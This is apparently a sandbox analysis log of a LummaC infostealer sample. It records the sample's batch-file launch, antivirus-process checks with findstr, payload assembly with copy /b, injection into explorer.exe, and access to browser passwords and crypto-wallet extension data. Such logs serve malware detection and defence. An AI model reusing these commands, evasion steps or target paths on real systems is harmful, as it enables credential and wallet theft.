          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 172.67.182.119 80
          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifMemory allocated: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe base: 10F0000 protect: page read and write
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeNtSetInformationThread: Direct from: 0xA09CC9
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeNtQuerySystemInformation: Direct from: 0x776D7B2E
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\SysWOW64\more.comMemory written: PID: 2120 base: 10179C0 value: 55
          Source: C:\Windows\SysWOW64\more.comMemory written: PID: 2120 base: 34C8008 value: 00
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
          Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifMemory written: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe base: 10F0000
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifMemory written: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe base: 8E02D8
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifMemory written: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe base: 8E11E8
          Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: 10179C0
          Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: 34C8008
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 215655
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "GeologicalAllowStoryVirtually" Commitments
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Started + ..\Spend + ..\Seek + ..\Etc + ..\Reliability + ..\Lingerie + ..\Washing g
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Comparing.pif g
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\f8077211 VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: 0000000C.00000003.1864702800.00000000014A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2521442122.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
